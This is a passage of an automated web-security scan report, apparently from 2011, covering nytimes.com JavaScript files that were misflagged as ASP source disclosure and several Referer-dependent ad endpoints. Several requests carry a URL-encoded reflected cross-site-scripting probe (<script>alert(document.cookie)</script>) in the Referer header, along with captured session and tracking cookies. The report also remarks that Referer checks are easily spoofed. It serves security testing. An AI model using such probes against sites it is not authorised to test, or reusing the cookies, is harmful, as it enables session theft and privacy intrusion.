Host:	http://graphics8.nytimes.com
Path:	/js/app/lib/NYTD/0.0.1/template.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/lib/NYTD/0.0.1/template.js HTTP/1.1
Host: graphics8.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=53C30AB57480F9FF91684174FCA4F3EF&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.13.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305122094061:ss=1305120271481; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 1250
Content-Type: application/x-javascript
Last-Modified: Thu, 11 Dec 2008 17:36:12 GMT
ETag: "4e2-49414f8c"
Accept-Ranges: bytes
Cache-Control: private, max-age=65579
Date: Thu, 12 May 2011 11:25:53 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1250

// Simple JavaScript Templating
// John Resig - http://ejohn.org/ - MIT Licensed
// Modified to sit happily in our NYTD Namespace
(function(){
var cache = {};

NYTD.Template = function(str, data
...[SNIP]...
he data as local variables using with(){}
"with(obj){p.push('" +

// Convert the template into pure JavaScript
str
.replace(/[\r\t\n]/g, " ")
.split("<%").join("\t")
.replace(/((^|%>)[^\t]*)'/g, "$1\r")
.replace(/\t=(.*?)%>
...[SNIP]...

16.6. http://graphics8.nytimes.com/js/app/timespeople/activities/1.6/activities.build.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://graphics8.nytimes.com
Path:	/js/app/timespeople/activities/1.6/activities.build.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/timespeople/activities/1.6/activities.build.js HTTP/1.1
Host: graphics8.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=D72AE6ABBF59ABA913779248634DD9BA&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.14.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305122094061:ss=1305120271481; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 43493
Content-Type: application/x-javascript
Last-Modified: Mon, 02 May 2011 19:52:33 GMT
ETag: "a9e5-4dbf0b81"
Accept-Ranges: bytes
Cache-Control: private, max-age=315623
Date: Thu, 12 May 2011 11:25:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 43493

/*
$Id: activities.build.js 65714 2011-04-22 15:26:35Z alex.wallace $
(c) 2008 The New York Times Company
*/

/*
Determining page group, type, title and descriptions based on META tags
*/
TimesPeople.
...[SNIP]...
<span><%= label %></span>
...[SNIP]...
<span><%= label %></span>
...[SNIP]...

16.7. http://graphics8.nytimes.com/js/app/timespeople/toolbar/1.7/toolbar.build.min.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://graphics8.nytimes.com
Path:	/js/app/timespeople/toolbar/1.7/toolbar.build.min.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/timespeople/toolbar/1.7/toolbar.build.min.js HTTP/1.1
Host: graphics8.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=53C30AB57480F9FF91684174FCA4F3EF&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.13.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305122094061:ss=1305120271481; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 51838
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 19:15:30 GMT
ETag: "ca7e-4d88f552"
Accept-Ranges: bytes
Cache-Control: private, max-age=65593
Date: Thu, 12 May 2011 11:25:57 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 51838

var TimesPeople=TimesPeople||{};if(typeof Object.create!=="function"){Object.create=function(o){function F(){}F.prototype=o;return new F()}}(function(app){var debug=false;if(typeof console=="undefined
...[SNIP]...
le);(function(app){var cache={};app.template=function(str,data){var fn=new Function("obj","var p=[],print=function(){p.push.apply(p,arguments);};with(obj){p.push('"+str.replace(/[\r\t\n]/g," ").split("<%").join("\t").replace(/((^|%>)[^\t]*)'/g,"$1\r").replace(/\t=(.*?)%>
...[SNIP]...
<div id="TP_container_shadow"<% if (!hasNativeShadow) { %> class="border-shadow"<% } %>
...[SNIP]...
<a href="<%= userpage %>"><img class="TP_avatar" src="<%= picURL %>">
...[SNIP]...
<a class="TP_user" href="<%= userpage %>"><%= actorDisplayname %></a> <%= verb %><%= punctuation %> </span>
...[SNIP]...
<a origin="tp" href="<%= object_url %>" title="<%= object %>"><%= truncated_object %></a></span> <% if (object_note) { %> <img src="<%= TimesPeople.Config.image_host + TimesPeople.Config.image_path %>toolbar/1.5/annotation.gif">
...[SNIP]...
<% } %> <% if (display_annotations && object_note) { %> <p class="TP_annotation">“<%= object_note %>”</p>
...[SNIP]...
<td class="TP_timestamp_cell"><%= date %></td>
...[SNIP]...
<a href="<%= userpage %>"><img class="TP_avatar" src="<%= picURL %>">
...[SNIP]...
<a class="TP_user" href="<%= userpage %>"><%= actorDisplayname %></a> <%= verb %></span> <% if (object_note) { %> <img src="<%= TimesPeople.Config.image_host + TimesPeople.Config.image_path %>toolbar/1.5/annotation.gif">
...[SNIP]...
<% } %> <% if (object_note) { %> <p class="TP_annotation">“<%= object_note %>”</p>
...[SNIP]...
<a href="<%= userpage %>"><img class="TP_avatar you" src="<%= picURL %>"></a> <h4 class="TP_header"> <% if (userpage) { %> <a href="<%= userpage %>"> <%= displayname %> </a> <% } else { %> <%= displayname %> <% } %>
...[SNIP]...
<p class="TP_following_count"> <% if (followers_url) { %> <a href="<%= followers_url %>"> <%= people_count %> </a> <% } else { %> <%= people_count %> <% } %>
...[SNIP]...
<div class="TP_drawer_tooltip_inner"> <%= tooltipText %> </div>
...[SNIP]...
<h4><%= openText %></h4>
...[SNIP]...

16.8. http://graphics8.nytimes.com/js2/lib/facebook/article/1.0/build.min.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://graphics8.nytimes.com
Path:	/js2/lib/facebook/article/1.0/build.min.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js2/lib/facebook/article/1.0/build.min.js HTTP/1.1
Host: graphics8.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 20078
Content-Type: application/x-javascript
Last-Modified: Thu, 05 May 2011 18:59:30 GMT
ETag: "4e6e-4dc2f392"
Accept-Ranges: bytes
Cache-Control: private, max-age=2394
Date: Thu, 12 May 2011 11:02:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 20078

NYTD.track=function(){if("dcsMultiTrack" in window){dcsMultiTrack.apply(this,arguments)}else{setTimeout(function(){NYTD.track.apply(this,arguments)},1000)}};NYTD.Facebook={APP_ID:"9869919170",API_KEY:
...[SNIP]...
<div class="activity"> <% if (user.image) { %> <img class="userImage" height="25" width="25" src="<%= user.image %>" />
...[SNIP]...
<a href="<%= user.href %>"><%= user.name %></a>
...[SNIP]...
<a href="<%= url %>"><%= title %></a>
...[SNIP]...
<a href="<%= url %>"><%= title %></a>
...[SNIP]...
<div class="activity"> <% if (img) { %> <img class="runaroundRight" height="50" width="50" src="<%= img %>" />
...[SNIP]...
<a href="<%= url %>"><%= title %></a>
...[SNIP]...
<span><%= label %></span>
...[SNIP]...

16.9. https://myaccount.nytimes.com/js/adx/googleads.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://myaccount.nytimes.com
Path:	/js/adx/googleads.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/adx/googleads.js HTTP/1.1
Host: myaccount.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://myaccount.nytimes.com/auth/login?URI=http://dealbook.nytimes.com/category/main-topicse7f31%2522%253E%253Cscript%253Ealert%25281%2529%253C/script%253Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=ABBCA6EE6FB956FC70EF4BEBA92D8B48&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.15.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199607199:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 12 May 2011 11:27:08 GMT
Content-type: application/x-javascript
Last-modified: Wed, 06 Apr 2011 17:22:29 GMT
ntCoent-length: 17979
Etag: "463b-4d9ca155"
Accept-ranges: bytes
Cache-Control: private
Content-Length: 17979

/*global NYTD, window, escape */
/*
$Id: googleads.js 62412 2011-03-23 20:10:19Z helckt $
(c) 2010 The New York Times Company
*/

NYTD.GoogleAds = NYTD.GoogleAds || {

   defaultGoogleParam
...[SNIP]...
<a href="#" onclick="linkbox(\'<%=url%>\',\'popWin\')">
...[SNIP]...
<span class="blue"><%=line1%></span><%=line2%><br/>'+
                   '<div class="link"><%=visibleUrl%></div>
...[SNIP]...
<a onclick="linkbox(\'<%=url%>\',\'popWin\')" class="blue" href="#"><%=line1%></a>' +
               '<br/><%=line2%><br/><%=line3%><br/>
...[SNIP]...
<a onclick="linkbox(\'<%=url%>\',\'popWin\')" class="green" href="#"><%=visibleUrl%></a>
...[SNIP]...
<a href="http://<%=queryHost%>/search/query?srchst=r&term=<%=term%>&google_ad_channel=health&' +
               'google_ad_client=ca-nytimes_radlinks_js&google_page_url=<%=thisPage%>">' +
                   '<%=term%>' +
               '</a>
...[SNIP]...
<tr class="listing" bidtype="<%=bidType%>" targetingType="<%=targetingType%>">
...[SNIP]...
<a class="first" target="_blank" href="<%=url%>"><%=line1%></a><br/>' +
                   '<%=line2%><br/>' +
                   '<%=line3%><br/>' +
                   '<a class="last" target="_blank" href="<%=url%>"><%=visibleUrl%></a>
...[SNIP]...
<a href="<%=url%>" target="_top" title="go to <%=visibleUrl%>" bidtype="<%=bidType%>" targetingType="<%=targetingType%>">' +
                   '<img border="0" src="<%=imageUrl%>" width="<%=imageWidth%>" height="<%=imageHeight%>">
...[SNIP]...
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="<%=imageWidth%>" height="<%=imageHeight%>" bidtype="<%=bidType%>" targetingType="<%=targetingType%>">' +
                   '<param name="movie" value="<%=imageUrl%>">
...[SNIP]...
<embed src="<%=imageUrl%>" width="<%=imageWidth%>" height="<%=imageHeight%> type="application/x-shockwave-flash" AllowScriptAccess="never" pluginspage="http://www.macromedia.com/go/getflashplayer">
...[SNIP]...

16.10. https://myaccount.nytimes.com/js/app/lib/NYTD/0.0.1/template.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://myaccount.nytimes.com
Path:	/js/app/lib/NYTD/0.0.1/template.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/lib/NYTD/0.0.1/template.js HTTP/1.1
Host: myaccount.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://myaccount.nytimes.com/auth/login?URI=http://dealbook.nytimes.com/category/main-topicse7f31%2522%253E%253Cscript%253Ealert%25281%2529%253C/script%253Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=ABBCA6EE6FB956FC70EF4BEBA92D8B48&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.15.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199607199:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 12 May 2011 11:27:10 GMT
Content-type: application/x-javascript
Last-modified: Wed, 06 Apr 2011 21:29:47 GMT
ntCoent-length: 1250
Etag: "4e2-4d9cdb4b"
Accept-ranges: bytes
Cache-Control: private
Content-Length: 1250

// Simple JavaScript Templating
// John Resig - http://ejohn.org/ - MIT Licensed
// Modified to sit happily in our NYTD Namespace
(function(){
var cache = {};

NYTD.Template = function(str, data
...[SNIP]...
he data as local variables using with(){}
"with(obj){p.push('" +

// Convert the template into pure JavaScript
str
.replace(/[\r\t\n]/g, " ")
.split("<%").join("\t")
.replace(/((^|%>)[^\t]*)'/g, "$1\r")
.replace(/\t=(.*?)%>
...[SNIP]...

17. Referer-dependent response previous next
There are 4 instances of this issue:

http://ad.yieldmanager.com/imp
http://ads.adbrite.com/adserver/vdi/742697
http://adserving.cpxinteractive.com/st
http://www.facebook.com/plugins/like.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

17.1. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.yieldmanager.com
Path:	/imp

Request 1

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:03 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0196.rm.bf1
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 12:02:03 GMT
Pragma: no-cache
Content-Length: 7080
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

oV1=window; function fStart(u,n,v) { if (!oV1.opera) var twin=oV1.open(u,n,v); if (!window.fV1) {fV13();} var w=oV2(u,n,v); var wo=vWA[w]; wo.pw=twin; fV3("fV10(" + w + ")",100); return (wo.pw&&fV35)
...[SNIP]...
wUtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADsRBEAAAAAAAICAgAAAAAAaJHtfD81IkBoke18PzUiQAAAAAAAAAAA..-.J2RBLUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsQ9Oqu7AUCu0Vv0IxA4-HPcwjaDkZa8Y4e8KdAAAAAA==,,http%3A%2F%2Fpepperhamilton.com%2F%3Fepl%3D7vc_zcf-qaineur8rrn2eld1uychhmipkrv4hu2icszqhp18zi-zqhke8c0nditmgf6myi8crelfjtduqvtegsrgy6_nrn4uxmreqxnqebzqbc2utdekuiaxnrmz27autdpfjeh2pryyomlkmtkon5opgpo8kgkayibaqbf1acaq3oe_aadgfwuaaeca2wgaako-cvbzuyzzqte2afpcgwaaapa,Z%3D0x0%26anmember%3D541%26anprice%3D%26y%3D29%26s%3D1748713%26_salt%3D1407533862%26B%3D10%26r%3D0,a63431b0-7c8f-11e0-9572-678fd7baf522','','height='+screen.height+',width=' + screen.width + ',left=0,top=0,toolbar=0,status=0,menubar=0,resizable=1,scrollbars=1,location=0');
pop.blur();
window.focus();

Request 2

GET /imp?Z=0x0&anmember=541&anprice=&y=29&s=1748713&_salt=1407533862&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!Q!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; pv1="b!!!!:!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; bh="b!!!%+!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<w